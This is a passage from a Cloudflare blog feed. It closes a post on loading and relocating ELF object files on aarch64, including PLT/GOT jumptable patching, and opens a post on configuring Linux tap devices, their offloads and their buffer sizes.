	/* Concatenate opcode and value to get final instruction */
	*((uint32_t *)patch_offset) &amp;= mask_bl;
	val &amp;= ~mask_bl;
	*((uint32_t *)patch_offset) |= val;
	break;
case R_AARCH64_ADD_ABS_LO12_NC:
	/* The mask of `add` instruction to separate 
	* opcode, registers and calculated value 
	*/
	uint32_t mask_add = 0b11111111110000000000001111111111;
	/* S + A */
	uint32_t val = *(symbol_address + relocations[i].r_addend);
	val &amp;= ~mask_add;
	*((uint32_t *)patch_offset) &amp;= mask_add;
	/* Final instruction */
	*((uint32_t *)patch_offset) |= val;
case R_AARCH64_ADR_PREL_PG_HI21:
	/* Page(S+A)-Page(P), Page(expr) is defined as (expr &amp; ~0xFFF) */
	val = (((uint64_t)(symbol_address + relocations[i].r_addend)) &amp; ~0xFFF) - (((uint64_t)patch_offset) &amp; ~0xFFF);
	/* Shift right the calculated value by 12 bits.
	 * During decoding it will be shifted left as described above, 
	 * so we do the opposite.
	*/
	val &gt;&gt;= 12;
	/* Separate the lower and upper bits to place them in different positions */ 
	uint32_t immlo = (val &amp; (0xf &gt;&gt; 2)) &lt;&lt; 29 ;
	uint32_t immhi = (val &amp; ((0xffffff &gt;&gt; 13) &lt;&lt; 2)) &lt;&lt; 22;
	*((uint32_t *)patch_offset) |= immlo;
	*((uint32_t *)patch_offset) |= immhi;
	break;
}</code></pre>
            <p>Compile and run:</p>
            <pre><code>$ gcc -o loader loader.c 
$ ./loader
Executing add5...
add5(42) = 47
Executing add10...
add10(42) = 52
Executing get_hello...
get_hello() = Hello, world!
Executing get_var...
get_var() = 5
Executing set_var(42)...
Executing get_var again...
get_var() = 42</code></pre>
            <p>It works! The final code is <a href="https://github.com/cloudflare/cloudflare-blog/tree/master/2021-03-obj-file/4/2">here</a>.</p>
    <div>
      <h2>Executing example from Part 3 on aarch64</h2>
      <a href="#executing-example-from-part-3-on-aarch64">
        
      </a>
    </div>
    <p>Our <a href="/how-to-execute-an-object-file-part-3/">Part 3</a> is about resolving external dependencies. When we write code we don’t think much about how to allocate memory or print debug information to the console. Instead, we involve functions from the system libraries. But the code of system libraries needs to be passed through to our programs somehow. Additionally, for optimization purposes, it would be nice if this code would be stored in one place and shared between all programs. And another wish — we don’t want to resolve all the functions and global variables from the libraries, only those which we need and at those times when we need them. To solve these problems, ELF introduced two sections: PLT (the procedure linkage table) and GOT (the global offset table). The dynamic loader creates a list which contains all external functions and variables from the shared library, but doesn’t resolve them immediately; instead they are placed in the PLT section. Each external symbol is presented by a small function, a stub, e.g. <code>puts@plt</code>. When an external symbol is requested, the stub checks if it was resolved previously. If not, the stub searches for an absolute address of the symbol, returns to the requester and writes it in the GOT table. The next time, the address returns directly from the GOT table.</p><p>In <a href="/how-to-execute-an-object-file-part-3/">Part 3</a> we implemented a simplified PLT/GOT resolution. Firstly, we added a new function <a href="https://github.com/cloudflare/cloudflare-blog/blob/master/2021-03-obj-file/3/obj.c#L35"><code>say_hello</code></a> in the <code>obj.c</code>, which calls unresolved system library function <code>puts</code>. Further we added an optional wrapper <a href="https://github.com/cloudflare/cloudflare-blog/blob/master/2021-03-obj-file/3/loader.c#L73"><code>my_puts</code></a> in the <code>loader.c</code>. The wrapper isn’t required, we could’ve resolved directly to a standard function, but it's a good example of how the implementation of some functions can be overwritten with custom code. In the next steps we added our PLT/GOT resolution:</p><ul><li><p>PLT section we replaced with a <a href="https://github.com/cloudflare/cloudflare-blog/blob/master/2021-03-obj-file/3/loader.c#L340">jumptable</a></p></li><li><p>GOT we replaced with <a href="https://github.com/cloudflare/cloudflare-blog/blob/master/2021-03-obj-file/3/loader.c#L238-L248">assembly instructions</a></p></li></ul><p>Basically, we created a small stub with assembly code (our <code>jumptable</code>) to resolve the global address of our <code>my_puts</code> wrapper and jump to it.</p><p>The approach for aarch64 is the same. But the <code>jumptable</code> is very different as it consists of different assembly instructions.</p><p>The big difference here compared to the other parts is that we need to work with a 64-bit address for the GOT resolution. Our custom PLT or <code>jumptable</code> is placed close to the main code of <code>obj.c</code> and can operate with the relative addresses as before. For the GOT or referencing <code>my_puts</code> wrapper we’ll use different branch instructions — <a href="https://developer.arm.com/documentation/ddi0596/2021-12/Base-Instructions/BR--Branch-to-Register-"><code>br</code></a> or <a href="https://developer.arm.com/documentation/ddi0596/2021-12/Base-Instructions/BLR--Branch-with-Link-to-Register-"><code>blr</code></a>. These instructions branch to the register, where the aarch64 registers can hold 64-bit values.</p><p>We can check how it resolves with the native PLT/GOT in our loader assembly code:</p>
            <pre><code>$ objdump --disassemble --section=.text loader
...
1d2c:	97fffb45 	bl	a40 &lt;puts@plt&gt;
1d30:	f94017e0 	ldr	x0, [sp, #40]
1d34:	d63f0000 	blr	x0
...</code></pre>
            <p>The first instruction is <code>bl</code> jump to <code>puts@plt</code> stub. The next <a href="https://developer.arm.com/documentation/ddi0596/2021-12/Base-Instructions/LDR--immediate---Load-Register--immediate--"><code>ldr</code></a> instruction tells us that some value was loaded into the register <code>x0</code> from the stack. Each function has its own <a href="https://en.wikipedia.org/wiki/Call_stack#Stack_and_frame_pointers">stack frame</a> to hold the local variables. The last <code>blr</code> instruction makes a jump to the address stored in <code>x0</code> register. There is an agreement in the register naming: if the stored value is 64-bits then the register is called <code>x0-x30</code>; if only 32-bits are used then it’s called <code>w0-w30</code> (the value will be stored in the lower 32-bits and upper 32-bits will be zeroed).</p><p>We need to do something similar — place the absolute address of our <code>my_puts</code> wrapper in some register and call <code>br</code> on this register. We don’t need to store the link before branching, the call will be returned to <code>say_hello</code> from <code>obj.c</code>, which is why a plain <code>br</code> will be enough. Let’s check an assembly of simple C-function:</p><p>hello.c:</p>
            <pre><code>#include &lt;stdint.h&gt;

void say_hello(void)
{
    uint64_t reg = 0x555555550c14;
}</code></pre>
            
            <pre><code>$ gcc -c hello.c
$ objdump --disassemble --section=.text hello.o

hello.o:     file format elf64-littleaarch64


Disassembly of section .text:

0000000000000000 &lt;say_hello&gt;:
   0:	d10043ff 	sub	sp, sp, #0x10
   4:	d2818280 	mov	x0, #0xc14                 	// #3092
   8:	f2aaaaa0 	movk	x0, #0x5555, lsl #16
   c:	f2caaaa0 	movk	x0, #0x5555, lsl #32
  10:	f90007e0 	str	x0, [sp, #8]
  14:	d503201f 	nop
  18:	910043ff 	add	sp, sp, #0x10
  1c:	d65f03c0 	ret</code></pre>
            <p>The number <code>0x555555550c14</code> is the address returned by <a href="https://github.com/cloudflare/cloudflare-blog/blob/master/2021-03-obj-file/3/loader.c#L238"><code>lookup_ext_function</code></a>. We’ve printed it out to use as an example, but any <a href="https://www.kernel.org/doc/html/latest/arch/arm64/memory.html">48-bits</a> hex value can be used.</p><p>In our output we see that the value was split in three sections and written in <code>x0</code> register with three instructions: one <a href="https://developer.arm.com/documentation/ddi0596/2021-12/Base-Instructions/MOV--inverted-wide-immediate---Move--inverted-wide-immediate---an-alias-of-MOVN-"><code>mov</code></a> and two <a href="https://developer.arm.com/documentation/ddi0596/2021-12/Base-Instructions/MOVK--Move-wide-with-keep-?lang=en"><code>movk</code></a>. The documentation says that there are only 16 bits for the immediate value, but a shift can be applied (in our case left shift <code>lsl</code>).</p><p>However, we can’t use <code>x0</code> in our context. By <a href="https://developer.arm.com/documentation/den0024/a/The-ABI-for-ARM-64-bit-Architecture/Register-use-in-the-AArch64-Procedure-Call-Standard/Parameters-in-general-purpose-registers">convention</a> the registers <code>x0-x7</code> are caller-saved and used to pass function parameters between calls to other functions. Let’s use <code>x9</code> then.</p><p>We need to modify our loader. Firstly let’s change the jumptable structure.</p><p>loader.c:</p>
            <pre><code>...
struct ext_jump {
	uint32_t instr[4];
};
...</code></pre>
            <p>As we saw above, we need four instructions: <code>mov</code>, <code>movk</code>, <code>movk</code>, <code>br</code>. We don’t need a stack frame as we aren’t preserving any local variables. We just want to load the address into the register and branch to it. But we can’t write human-readable code</p><p>e.g. <code>mov  x0, #0xc14</code> into instructions, we need machine binary or hex representation, e.g. <code>d2818280</code>.</p><p>Let’s write a simple assembly code to get it:</p><p>hw.s:</p>
            <pre><code>.global _start

_start: mov     x9, #0xc14 
        movk    x9, #0x5555, lsl #16
        movk    x9, #0x5555, lsl #32
        br      x9</code></pre>
            
            <pre><code>$ as -o hw.o hw.s
$ objdump --disassemble --section=.text hw.o

hw.o:     file format elf64-littleaarch64


Disassembly of section .text:

0000000000000000 &lt;_start&gt;:
   0:	d2818289 	mov	x9, #0xc14                 	// #3092
   4:	f2aaaaa9 	movk	x9, #0x5555, lsl #16
   8:	f2caaaa9 	movk	x9, #0x5555, lsl #32
   c:	d61f0120 	br	x9</code></pre>
            <p>Almost done! But there’s one more thing to consider. Even if the value <code>0x555555550c14</code> is a real <code>my_puts</code> wrapper address, it will be different on each run if <a href="https://en.wikipedia.org/wiki/Address_space_layout_randomization">ASLR(Address space layout randomization)</a> is enabled. We need to patch these instructions to put the value which will be returned by <a href="https://github.com/cloudflare/cloudflare-blog/blob/master/2021-03-obj-file/3/loader.c#L238"><code>lookup_ext_function</code></a> on each run. We’ll split the obtained value in three parts, 16-bits each, and replace them in our <a href="https://developer.arm.com/documentation/ddi0596/2021-12/Base-Instructions/MOV--inverted-wide-immediate---Move--inverted-wide-immediate---an-alias-of-MOVN-"><code>mov</code></a> and <a href="https://developer.arm.com/documentation/ddi0596/2021-12/Base-Instructions/MOVK--Move-wide-with-keep-?lang=en"><code>movk</code></a> instructions according to the documentation, similar to what we did before for our second part.</p>
            <pre><code>if (symbols[symbol_idx].st_shndx == SHN_UNDEF) {
	static int curr_jmp_idx = 0;

	uint64_t addr = lookup_ext_function(strtab +  symbols[symbol_idx].st_name);
	uint32_t mov = 0b11010010100000000000000000001001 | ((addr &lt;&lt; 48) &gt;&gt; 43);
	uint32_t movk1 = 0b11110010101000000000000000001001 | (((addr &gt;&gt; 16) &lt;&lt; 48) &gt;&gt; 43);
	uint32_t movk2 = 0b11110010110000000000000000001001 | (((addr &gt;&gt; 32) &lt;&lt; 48) &gt;&gt; 43);
	jumptable[curr_jmp_idx].instr[0] = mov;         // mov  x9, #0x0c14
	jumptable[curr_jmp_idx].instr[1] = movk1;       // movk x9, #0x5555, lsl #16
	jumptable[curr_jmp_idx].instr[2] = movk2;       // movk x9, #0x5555, lsl #32
	jumptable[curr_jmp_idx].instr[3] = 0xd61f0120;  // br   x9

	symbol_address = (uint8_t *)(&amp;jumptable[curr_jmp_idx].instr[0]);
	curr_jmp_idx++;
} else {
	symbol_address = section_runtime_base(&amp;sections[symbols[symbol_idx].st_shndx]) + symbols[symbol_idx].st_value;
}
uint32_t val;
switch (type)
{
case R_AARCH64_CALL26:
	/* The mask separates opcode (6 bits) and the immediate value */
	uint32_t mask_bl = (0xffffffff &lt;&lt; 26);
	/* S+A-P, divided by 4 */
	val = (symbol_address + relocations[i].r_addend - patch_offset) &gt;&gt; 2;
	/* Concatenate opcode and value to get final instruction */
	*((uint32_t *)patch_offset) &amp;= mask_bl;
	val &amp;= ~mask_bl;
	*((uint32_t *)patch_offset) |= val;
	break;
...</code></pre>
            <p>In the code we took the address of the first instruction <code>&amp;jumptable[curr_jmp_idx].instr[0]</code> and wrote it in the <code>symbol_address</code>, further because the <code>type</code> is still <code>R_AARCH64_CALL26</code> it will be put into <code>bl</code> - jump to the relative address. Where our relative address is the first <code>mov</code> instruction. The whole <code>jumptable</code> code will be executed and finished with the <code>blr</code> instruction.</p><p>The final run:</p>
            <pre><code>$ gcc -o loader loader.c
$ ./loader
Executing add5...
add5(42) = 47
Executing add10...
add10(42) = 52
Executing get_hello...
get_hello() = Hello, world!
Executing get_var...
get_var() = 5
Executing set_var(42)...
Executing get_var again...
get_var() = 42
Executing say_hello...
my_puts executed
Hello, world!</code></pre>
            <p>The final code is <a href="https://github.com/cloudflare/cloudflare-blog/tree/master/2021-03-obj-file/4/3">here</a>.</p>
    <div>
      <h2>Summary</h2>
      <a href="#summary">
        
      </a>
    </div>
    <p>There are several things we covered in this blog post. We gave a brief introduction on how the binary got executed on Linux and how all components are linked together. We saw a big difference between x86 and aarch64 assembly. We learned how we can hook into the code and change its behavior. But just as it was said in the first blog post of this series, the most important thing is to remember to always think about security first. Processing external inputs should always be done with great care. Bounds and integrity checks have been omitted for the purposes of keeping the examples short, so readers should be aware that the code is not production ready and is designed for educational purposes only.</p> ]]></content:encoded>
            <category><![CDATA[Linux]]></category>
            <category><![CDATA[Programming]]></category>
            <category><![CDATA[Deep Dive]]></category>
            <guid isPermaLink="false">6bGK0NoXnHBGOjKvJ60FRu</guid>
            <dc:creator>Oxana Kharitonova</dc:creator>
        </item>
        <item>
            <title><![CDATA[Virtual networking 101: bridging the gap to understanding TAP]]></title>
            <link>https://blog.cloudflare.com/virtual-networking-101-understanding-tap/</link>
            <pubDate>Fri, 06 Oct 2023 13:05:33 GMT</pubDate>
            <description><![CDATA[ Tap devices were historically used for VPN clients. Using them for virtual machines is essentially reversing their original purpose - from traffic sinks to traffic sources. In the article I explore the intricacies of tap devices, covering topics like offloads, segmentation, and multi-queue. ]]></description>
            <content:encoded><![CDATA[ 
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5K0iKrieDwp0YkLViNDJKB/1c655399c5c70fe75c8f56f3294266a9/image1-5.png" />
            
            </figure><p>It's a never-ending effort to improve the performance of our infrastructure. As part of that quest, we wanted to squeeze as much network oomph as possible from our virtual machines. Internally for some projects we use <a href="https://firecracker-microvm.github.io/">Firecracker</a>, which is a KVM-based virtual machine manager (VMM) that runs light-weight “Micro-VM”s. Each Firecracker instance uses a tap device to communicate with a host system. Not knowing much about tap, I had to up my game, however, it wasn't easy — the documentation is messy and spread across the Internet.</p><p>Here are the notes that I wish someone had passed me when I started out on this journey!</p><p>A tap device is a virtual <b>network interface</b> that looks like an ethernet network card. Instead of having real wires plugged into it, it exposes a nice handy file descriptor to an application willing to send/receive packets. Historically tap devices were mostly used to implement VPN clients. The machine would route traffic towards a <b>tap interface</b>, and a VPN client application would pick them up and process accordingly. For example this is what our Cloudflare WARP Linux client does. Here's how it looks on my laptop:</p>
            <pre><code>$ ip link list
...
18: CloudflareWARP: &lt;POINTOPOINT,MULTICAST,NOARP,UP,LOWER_UP&gt; mtu 1280 qdisc mq state UNKNOWN mode DEFAULT group default qlen 500
	link/none

$ ip tuntap list
CloudflareWARP: tun multi_queue</code></pre>
            <p>More recently tap devices started to be used by <a href="https://www.cloudflare.com/learning/cloud/what-is-a-virtual-machine/">virtual machines</a> to enable networking. The VMM (like Qemu, Firecracker, or gVisor) would open the application side of a tap and pass all the packets to the guest VM. The tap network interface would be left for the host kernel to deal with. Typically, a host would behave like a router and firewall, forward or NAT all the packets. This design is somewhat surprising - it's almost reversing the original use case for tap. In the VPN days tap was a traffic destination. With a VM behind, tap looks like a traffic source.</p><p>A Linux tap device is a <b>mean creature</b>. It looks trivial — a virtual network interface, with a file descriptor behind it. However, it's <b>surprisingly hard</b> to get it to perform well. The Linux networking stack is optimized for packets handled by a physical network card, not a userspace application. However, over the years the Linux tap interface grew in features and nowadays, it's possible to get good performance out of it. Later I'll explain how to use the Linux tap API in a modern way.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/79hvP3TXwPib9DE9leEJbE/7f81ee55560cfdff5b7df7419adc91c5/Screenshot-2023-10-05-at-2.42.49-PM.png" />
            
            </figure><p>Source: DALL-E</p>
    <div>
      <h2>To tun or to tap?</h2>
      <a href="#to-tun-or-to-tap">
        
      </a>
    </div>
    <p>The interface is <a href="https://docs.kernel.org/networking/tuntap.html">called "the universal tun/tap"</a> in the kernel. The "tun" variant, accessible via the IFF_TUN flag, looks like a point-to-point link. There are no L2 Ethernet headers. Since most modern networks are Ethernet, this is a bit less intuitive to set up for a novice user. Most importantly, projects like Firecracker and gVisor do expect L2 headers.</p><p>"Tap", with the IFF_TAP flag, is the one which has Ethernet headers, and has been getting all the attention lately. If you are like me and always forget which one is which, you can use this  AI-generated rhyme (check out <a href="/writing-poems-using-llama-2-on-workers-ai/">WorkersAI/LLama</a>) to help to remember:</p><p><i>Tap is like a switch,</i><i>Ethernet headers it'll hitch.</i><i>Tun is like a tunnel,</i><i>VPN connections it'll funnel.</i><i>Ethernet headers it won't hold,</i><i>Tap uses, tun does not, we're told.</i></p>
    <div>
      <h2>Listing devices</h2>
      <a href="#listing-devices">
        
      </a>
    </div>
    <p>Tun/tap devices are natively supported by iproute2 tooling. Typically, one creates a device with <b>ip tuntap add</b> and lists it with <b>ip tuntap list</b>:</p>
            <pre><code>$ sudo ip tuntap add mode tap user marek group marek name tap0
$ ip tuntap list
tap0: tap persist user 1000 group 1000</code></pre>
            <p>Alternatively, it's possible to look for the <code>/sys/devices/virtual/net/&lt;ifr_name&gt;/tun_flags</code> files.</p>
    <div>
      <h2>Tap device setup</h2>
      <a href="#tap-device-setup">
        
      </a>
    </div>
    <p>To open or create a new device, you first need to open <code>/dev/net/tun</code> which is called a "clone device":</p>
            <pre><code>    /* First, whatever you do, the device /dev/net/tun must be
     * opened read/write. That device is also called the clone
     * device, because it's used as a starting point for the
     * creation of any tun/tap virtual interface. */
    char *clone_dev_name = "/dev/net/tun";
    int tap_fd = open(clone_dev_name, O_RDWR | O_CLOEXEC);
    if (tap_fd &lt; 0) {
   	 error(-1, errno, "open(%s)", clone_dev_name);
    }</code></pre>
            <p>With the clone device file descriptor we can now instantiate a specific tap device by name:</p>
            <pre><code>    struct ifreq ifr = {};
    strncpy(ifr.ifr_name, tap_name, IFNAMSIZ);
    ifr.ifr_flags = IFF_TAP | IFF_NO_PI | IFF_VNET_HDR;
    int r = ioctl(tap_fd, TUNSETIFF, &amp;ifr);
    if (r != 0) {
   	 error(-1, errno, "ioctl(TUNSETIFF)");
    }</code></pre>
            <p>If <b>ifr_name</b> is empty or with a name that doesn't exist, a new tap device is created. Otherwise, an existing device is opened. When opening existing devices, flags like IFF_MULTI_QUEUE must match with the way the device was created, or EINVAL is returned. It's a good idea to try to reopen the device with flipped multi queue setting on EINVAL error.</p><p>The <b>ifr_flags</b> can have the following bits set:</p><table><colgroup><col></col><col></col></colgroup><tbody><tr><td><p><span>IFF_TAP / IFF_TUN</span></p></td><td><p><span>Already discussed.</span></p></td></tr><tr><td><p><span>IFF_NO_CARRIER</span></p></td><td><p><span>Holding an open tap device file descriptor sets the Ethernet interface CARRIER flag up. In some cases it might be desired to delay that until a TUNSETCARRIER call.</span></p></td></tr><tr><td><p><span>IFF_NO_PI</span></p></td><td><p><span>Historically each packet on tap had a "struct tun_pi" 4 byte prefix. There are now better alternatives and this option disables this prefix.</span></p></td></tr><tr><td><p><span>IFF_TUN_EXCL</span></p></td><td><p><span>Ensures a new device is created. Returns EBUSY if the device exists</span></p></td></tr><tr><td><p><span>IFF_VNET_HDR</span></p></td><td><p><span>Prepend "</span><a href="https://elixir.bootlin.com/linux/v6.4.6/source/include/uapi/linux/virtio_net.h#L187"><span>struct virtio_net_hdr</span></a><span>" before the RX and TX packets, should be followed by setsockopt(TUNSETVNETHDRSZ).</span></p></td></tr><tr><td><p><span>IFF_MULTI_QUEUE</span></p></td><td><p><span>Use multi queue tap, see below.</span></p></td></tr><tr><td><p><span>IFF_NAPI / IFF_NAPI_FRAGS</span></p></td><td><p><span>See below.</span></p></td></tr></tbody></table><p>You almost always want IFF_TAP, IFF_NO_PI, IFF_VNET_HDR flags and perhaps sometimes IFF_MULTI_QUEUE.</p>
    <div>
      <h2>The curious IFF_NAPI</h2>
      <a href="#the-curious-iff_napi">
        
      </a>
    </div>
    <p>Judging by the <a href="https://www.mail-archive.com/netdev@vger.kernel.org/msg189704.html">original patchset introducing IFF_NAPI and IFF_NAPI_FRAGS</a>, these flags were introduced to increase code coverage of syzkaller. However, later work indicates there were <a href="https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=fb3f903769e805221eb19209b3d9128d398038a1">performance benefits when doing XDP on tap</a>. IFF_NAPI enables a dedicated NAPI instance for packets written from an application into a tap. Besides allowing XDP, it also allows packets to be batched and GRO-ed. Otherwise, a backlog NAPI is used.</p>
    <div>
      <h2>A note on buffer sizes</h2>
      <a href="#a-note-on-buffer-sizes">
        
      </a>
    </div>
    <p>Internally, a tap device is just a pair of packet queues. It's exposed as a network interface towards the host, and a file descriptor, a character device, towards the application. The queue in the direction of application (tap TX queue) is of size <b>txqueuelen</b> packets, controlled by an interface parameter:</p>
            <pre><code>$ ip link set dev tap0 txqueuelen 1000
$ ip -s link show dev tap0
26: tap0: &lt;BROADCAST,MULTICAST,UP,LOWER_UP&gt; mtu 1500 ... qlen 1000
	RX:  bytes packets errors dropped  missed   mcast      	 
         	0   	0  	0   	0   	0   	0
	TX:  bytes packets errors dropped carrier collsns      	 
       	266   	3  	0  	66   	0   	0</code></pre>
            <p>In "ip link" statistics the column "<b>TX dropped</b>" indicates the tap application was too slow and the queue space exhausted.</p><p>In the other direction - interface RX queue -  from application towards the host, the queue size limit is measured in bytes and controlled by the TUNSETSNDBUF ioctl. The <a href="https://elixir.bootlin.com/qemu/v8.1.1/source/net/tap-linux.c#L120">qemu comment discusses</a> this setting, however it's not easy to cause this queue to overflow. See this <a href="https://bugzilla.redhat.com/show_bug.cgi?id=508861">discussion for details</a>.</p>
    <div>
      <h2>vnethdr size</h2>
      <a href="#vnethdr-size">
        
      </a>
    </div>
    <p>After the device is opened, a typical scenario is to set up VNET_HDR size and offloads. Typically the VNETHDRSZ should be set to 12:</p>
            <pre><code>    len = 12;
    r = ioctl(tap_fd, TUNSETVNETHDRSZ, &amp;(int){len});
    if (r != 0) {
   	 error(-1, errno, "ioctl(TUNSETVNETHDRSZ)");
    }</code></pre>
            <p>Sensible values are {10, 12, 20}, which are derived from <a href="https://docs.oasis-open.org/virtio/virtio/v1.2/csd01/virtio-v1.2-csd01.html">virtio spec</a>. 12 bytes makes room for the following header (little endian):</p>
            <pre><code>struct virtio_net_hdr_v1 {
#define VIRTIO_NET_HDR_F_NEEDS_CSUM  1    /* Use csum_start, csum_offset */
#define VIRTIO_NET_HDR_F_DATA_VALID  2    /* Csum is valid */
    u8 flags;
#define VIRTIO_NET_HDR_GSO_NONE      0    /* Not a GSO frame */
#define VIRTIO_NET_HDR_GSO_TCPV4     1    /* GSO frame, IPv4 TCP (TSO) */
#define VIRTIO_NET_HDR_GSO_UDP       3    /* GSO frame, IPv4 UDP (UFO) */
#define VIRTIO_NET_HDR_GSO_TCPV6     4    /* GSO frame, IPv6 TCP */
#define VIRTIO_NET_HDR_GSO_UDP_L4    5    /* GSO frame, IPv4&amp; IPv6 UDP (USO) */
#define VIRTIO_NET_HDR_GSO_ECN       0x80 /* TCP has ECN set */
    u8 gso_type;
    u16 hdr_len;     /* Ethernet + IP + tcp/udp hdrs */
    u16 gso_size;    /* Bytes to append to hdr_len per frame */
    u16 csum_start;
    u16 csum_offset;
    u16 num_buffers;
};</code></pre>
            
    <div>
      <h2>offloads</h2>
      <a href="#offloads">
        
      </a>
    </div>
    <p>To enable offloads use the ioctl:</p>
            <pre><code>    unsigned off_flags = TUN_F_CSUM | TUN_F_TSO4 | TUN_F_TSO6;
    int r = ioctl(tap_fd, TUNSETOFFLOAD, off_flags);
    if (r != 0) {
   	 error(-1, errno, "ioctl(TUNSETOFFLOAD)");
    }</code></pre>
            <p>Here are the allowed bit values. They confirm that the userspace application can receive:</p><table><colgroup><col></col><col></col></colgroup><tbody><tr><td><p><span>TUN_F_CSUM</span></p></td><td><p><span>L4 packet checksum offload</span></p></td></tr><tr><td><p><span>TUN_F_TSO4</span></p></td><td><p><span>TCP Segmentation Offload - TSO for IPv4 packets</span></p></td></tr><tr><td><p><span>TUN_F_TSO6</span></p></td><td><p><span>TSO for IPv6 packets</span></p></td></tr><tr><td><p><span>TUN_F_TSO_ECN</span></p></td><td><p><span>TSO with ECN bits</span></p></td></tr><tr><td><p><span>TUN_F_UFO</span></p></td><td><p><span>UDP Fragmentation offload - UFO packets. Deprecated</span></p></td></tr><tr><td><p><span>TUN_F_USO4</span></p></td><td><p><span>UDP Segmentation offload - USO for IPv4 packets</span></p></td></tr><tr><td><p><span>TUN_F_USO6</span></p></td><td><p><span>USO for IPv6 packets</span></p></td></tr></tbody></table><p>Generally, offloads are extra packet features the tap application can deal with. Details of the offloads used by the sender are set on each packet in the vnethdr prefix.</p>
    <div>
      <h2>Checksum offload TUN_F_CSUM</h2>
      <a href="#checksum-offload-tun_f_csum">
        
      </a>
    </div>
    
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5QEojUsAvj7VueXmGRSexc/37671b9c92dcc7f6c40bf572cd6e73dc/image4.jpg" />
            
            </figure><p>Structure of a typical UDP packet received over tap.</p><p>Let's start with the checksumming offload. The TUN_F_CSUM offload saves the kernel some work by pushing the checksum processing down the path. Applications which set that flag are indicating they can handle checksum validation. For example with this offload, for UDP IPv4 packet will have:</p><ul><li><p>vnethdr flags will have VIRTIO_NET_HDR_F_NEEDS_CSUM set</p></li><li><p>hdr_len would be 42 (14+20+8)</p></li><li><p>csum_start 34 (14+20)</p></li><li><p>and csum_offset 6 (UDP header checksum is 6 bytes into L4)</p></li></ul><p>This is illustrated above.</p><p>Supporting checksum offload is needed for further offloads.</p>
    <div>
      <h2>TUN_F_CSUM is a must</h2>
      <a href="#tun_f_csum-is-a-must">
        
      </a>
    </div>
    <p>Consider this code:</p>
            <pre><code>s = socket(AF_INET, SOCK_DGRAM)
s.setsockopt(SOL_UDP, UDP_SEGMENT, 1400)
s.sendto(b"x", ("10.0.0.2", 5201))     # Would you expect EIO ?</code></pre>
            <p>This simple code produces a packet. When directed at a tap device, this code will surprisingly yield an EIO "Input/output error". This weird behavior happens if the tap is opened without TUN_F_CSUM and the application is sending GSO / UDP_SEGMENT frames. Tough luck. It might be considered a kernel bug, and we're thinking about fixing that. However, in the meantime everyone using tap should just set the TUN_F_CSUM bit.</p>
    <div>
      <h2>Segmentation offloads</h2>
      <a href="#segmentation-offloads">
        
      </a>
    </div>
    <p>We wrote about <a href="/accelerating-udp-packet-transmission-for-quic/">UDP_SEGMENT</a> in the past. In short: on Linux an application can handle many packets with a single send/recv, as long as they have identical length.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/31mztfk8fZtP46WzeFrcID/4dd98352343ffafd1cf7d62847c06904/image2-4.png" />
            
            </figure><p>With UDP_SEGMENT a single send() can transfer multiple packets.</p><p>Tap devices support offloading which exposes that very functionality. With TUN_F_TSO4 and TUN_F_TSO6 flags the tap application signals it can deal with long packet trains. Note, that with these features the application must be ready to receive much larger buffers - up to 65507 bytes for IPv4 and 65527 for IPv6.</p><p>TSO4/TSO6 flags are enabling long packet trains for <a href="https://www.cloudflare.com/learning/ddos/glossary/tcp-ip/">TCP</a> and have been supported for a long time. More recently TUN_F_USO4 and TUN_F_USO6 bits were introduced for <a href="https://www.cloudflare.com/learning/ddos/glossary/user-datagram-protocol-udp/">UDP</a>. When any of these offloads are used, the <b>gso_type</b> contains the relevant offload type and <b>gso_size</b> holds a segment size within the GRO packet train.</p><p>TUN_F_UFO is a UDP fragmentation offload which is deprecated.</p><p>By setting TUNSETOFFLOAD, the application is telling the kernel which offloads it's able to handle on the read() side of a tap device. If the ioctl(TUNSETOFFLOAD) succeeds, the application can assume the kernel supports the same offloads for packets in the other direction.</p>
    <div>
      <h2>Bug in rx-udp-gro-forwarding - TUN_F_USO4</h2>
      <a href="#bug-in-rx-udp-gro-forwarding-tun_f_uso4">
        
      </a>
    </div>
    <p>When working with tap and offloads it's useful to inspect <b>ethtool</b>:</p>
            <pre><code>$ ethtool -k tap0 | egrep -v fixed
tx-checksumming: on
    tx-checksum-ip-generic: on
scatter-gather: on
    tx-scatter-gather: on
    tx-scatter-gather-fraglist: on
tcp-segmentation-offload: on
    tx-tcp-segmentation: on
generic-segmentation-offload: on
generic-receive-offload: on
tx-udp-segmentation: on
rx-gro-list: off
rx-udp-gro-forwarding: off</code></pre>
            <p>With ethtool we can see the enabled offloads and disable them as needed.</p><p>While toying with UDP Segmentation Offload (USO) I've noticed that when packet trains from tap are forwarded to a real network interface, sometimes they seem badly packetized. See the <a href="https://lore.kernel.org/all/CAJPywTKDdjtwkLVUW6LRA2FU912qcDmQOQGt2WaDo28KzYDg+A@mail.gmail.com/">netdev discussion</a>, and the <a href="https://lore.kernel.org/netdev/ZK9ZiNMsJX8+1F3N@debian.debian/T/#m9f532bb5463b89d997c5d16c78490ceeccb4497f">proposed fix</a>. In any case - beware of this bug, and maybe consider doing "ethtool -K tap0 rx-udp-gro-forwarding off".</p>
    <div>
      <h2>Miscellaneous setsockopts</h2>
      <a href="#miscellaneous-setsockopts">
        
      </a>
    </div>
    
    <div>
      <h4>Setup related socket options</h4>
      <a href="#setup-related-socket-options">
        
      </a>
    </div>
